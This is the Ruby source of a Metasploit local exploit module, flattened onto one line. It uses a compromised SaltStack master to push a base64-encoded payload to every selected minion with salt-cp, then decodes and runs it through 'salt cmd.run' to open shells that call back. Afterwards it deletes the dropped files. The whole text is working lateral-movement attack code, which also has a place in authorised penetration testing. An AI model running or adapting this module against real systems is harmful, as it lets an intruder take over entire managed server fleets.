Saltstack Minion Payload Deployer

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = GoodRanking  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  include Msf::Exploit::Local::Saltstack  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Saltstack Minion Payload Deployer',        'Description' => %q{          This exploit module uses saltstack salt to deploy a payload and run it          on all targets which have been selected (default all).          Currently only works against nix targets.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'c2Vlcgo'        ],        'Platform' => [ 'linux', 'unix' ],        'Stance' => Msf::Exploit::Stance::Passive,        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [],        'DisclosureDate' => '2011-03-19', # saltstack salt original release date        'DefaultTarget' => 0,        'Passive' => true, # this allows us to get multiple shells calling home        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]        }      )    )    register_options [      OptString.new('SALT', [true, 'salt-master executable location', '']),      OptString.new('MINIONS', [true, 'Minions Target', '*']),      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),      OptString.new('TargetWritableDir', [ true, 'A directory where we can write and execute files on targets', '/tmp' ]),      OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]),      OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions', 60 ]),      OptInt.new('TIMEOUT', [true, 'Timeout for salt commands to run in seconds', 120])    ]  end  def salt_master    return @salt if @salt    [datastore['SALT'], '/usr/bin/salt-master', '/usr/local/bin/salt-master'].each do |exec|      next unless executable?(exec)      @salt = exec      return @salt    end    @salt  end  def list_minions_printer    minions = list_minions    return if minions.nil?    tbl = Rex::Text::Table.new(      'Header' => 'Minions List',      'Indent' => 1,      'Columns' => ['Status', 'Minion Name']    )    count = 0    minions['minions'].each do |minion|      tbl << ['Accepted', minion]      count += 1    end    print_good(tbl.to_s)    # https://github.com/rapid7/metasploit-framework/pull/18626#discussion_r1434577017    print_good("#{count} minions were found in the accepted state, and will attempt to execute payload. If this isn't an expected volume (too many), ctr+c to halt execution. Pausing 10 seconds.")    Rex.sleep(10)    count  end  def check    return CheckCode::Safe('salt-master does not seem to be installed, unable to find salt-master executable') if salt_master.nil?    CheckCode::Vulnerable('salt-master executable found')  end  def exploit    # Make sure we can write our exploit and payload to the local system    fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir']    count = 1 # default to running if we decide not to calculate    count = list_minions_printer if datastore['CALCULATE']    fail_with Failure::NotFound, 'No exploitable minions found.' if count == 0    payload_name = rand_text_alphanumeric(5..10)    # due to a bug in older (2021) versions of salt-cp, we need to write ascii files. https://github.com/saltstack/salt/issues/59899    upload_and_chmodx "#{datastore['WritableDir']}/#{payload_name}", Rex::Text.encode_base64(generate_payload_exe)    print_status('Copying payload to minions')    cmd_exec("salt-cp '#{datastore['MINIONS']}' '#{datastore['WritableDir']}/#{payload_name}' '#{datastore['TargetWritableDir']}/#{payload_name}.b64'")    print_status('Executing payloads')    cmd_exec("salt '#{datastore['MINIONS']}' cmd.run 'base64 -d #{datastore['TargetWritableDir']}/#{payload_name}.b64 > #{datastore['TargetWritableDir']}/#{payload_name} && chmod 755 #{datastore['TargetWritableDir']}/#{payload_name} && #{datastore['TargetWritableDir']}/#{payload_name}'")    # stolen from exploit/multi/handler    stime = Time.now.to_f    timeout = datastore['ListenerTimeout'].to_i    loop do      break if timeout > 0 && (stime + timeout < Time.now.to_f)      Rex::ThreadSafe.sleep(1)    end  end  def on_new_session(_session)    super    cli.core.use('stdapi') if !cli.ext.aliases.include?('stdapi')    begin      print_warning("Deleting: #{datastore['TargetWritableDir']}/#{payload_name}")      cli.fs.file.rm("#{datastore['TargetWritableDir']}/#{payload_name}")      print_good("#{datastore['TargetWritableDir']}/#{payload_name} removed")    rescue StandardError      print_error("Unable to delete: #{datastore['TargetWritableDir']}/#{payload_name}")    end  endend